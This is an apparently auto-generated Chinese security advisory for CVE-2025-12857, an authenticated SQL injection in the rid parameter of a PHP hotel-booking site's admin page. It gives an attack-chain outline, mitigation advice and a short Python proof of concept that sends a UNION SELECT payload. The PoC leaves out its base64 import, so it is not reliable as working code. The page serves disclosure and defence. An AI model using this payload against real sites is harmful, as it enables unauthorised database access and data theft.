CVE-2025-12857 CVSS 4.7 中危

CVE-2025-12857: code-projects Responsive Hotel Site 1.0 SQL注入漏洞

披露日期: 2025-11-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12857

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Responsive Hotel Site 1.0

漏洞概述

CVE-2025-12857是code-projects Responsive Hotel Site 1.0版本中的一个中等严重性安全漏洞。该漏洞存在于/admin/roombook.php文件中，攻击者可以通过操纵rid参数实现SQL注入攻击。由于该漏洞需要高权限认证，攻击者需要具备管理员权限才能利用此漏洞。CVSS评分为4.7，属于中危级别。漏洞已公开披露，攻击代码已公开可用，可能被恶意攻击者利用进行未授权的数据库操作，包括但不限于数据窃取、数据篡改或敏感信息泄露等恶意行为。

技术细节

该SQL注入漏洞位于/admin/roombook.php文件中的rid参数。攻击者通过构造恶意的SQL语句注入到rid参数中，可以绕过正常的输入验证机制。由于该漏洞需要高权限用户认证（PR:H），攻击者必须首先获取管理员账户的访问权限。一旦成功利用，攻击者可以在数据库执行任意SQL命令，包括读取敏感数据、修改数据库内容或执行系统命令。漏洞的CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），对机密性、完整性和可用性均造成低程度影响。攻击者可利用公开的POC代码快速定位和利用此漏洞。

攻击链分析

STEP 1

步骤1

攻击者获取管理员账户凭证或通过其他漏洞提升权限至管理员级别

STEP 2

步骤2

攻击者访问/admin/roombook.php管理页面并使用管理员身份登录

STEP 3

步骤3

攻击者构造恶意SQL注入payload，通过rid参数注入UNION SELECT等SQL语句

STEP 4

步骤4

服务器执行恶意SQL语句，攻击者获取数据库敏感信息或执行未授权操作

STEP 5

步骤5

攻击者利用获取的数据进行进一步攻击，如横向移动或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12857 SQL Injection PoC
# Target: /admin/roombook.php
# Parameter: rid
# Authentication: Required (High Privileges)

import requests
import sys

target_url = "http://target.com/admin/roombook.php"

# SQL Injection payload for extracting database version
payload = {"rid": "1' UNION SELECT NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL-- -"}

# Basic authentication headers (admin credentials)
headers = {
    "Authorization": "Basic " + base64.b64encode(b"admin:password").decode()
}

try:
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print(f"[+] Request sent to {target_url}")
        print(f"[+] Status: {response.status_code}")
        print(f"[+] Response length: {len(response.text)}")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

code-projects Responsive Hotel Site 1.0

防御指南

临时缓解措施

立即对/admin/roombook.php文件中的rid参数进行输入验证，使用参数化查询替代动态SQL拼接。限制管理员账户的访问权限，启用数据库审计日志监控异常查询行为。在修复前，可暂时禁用相关功能模块或部署WAF规则阻断SQL注入攻击特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12857
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12857
3 Details https://www.cvedetails.com/cve/CVE-2025-12857/
4 VulDB https://vuldb.com/cve/CVE-2025-12857
5 Link https://code-projects.org/
6 Link https://github.com/AmengDream/CVE/blob/main/Responsive_Hotel_Site/roombook-sql-injection/report.md
7 Link https://vuldb.com/?ctiid.331503
8 Link https://vuldb.com/?id.331503
9 Link https://vuldb.com/?submit.679745

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表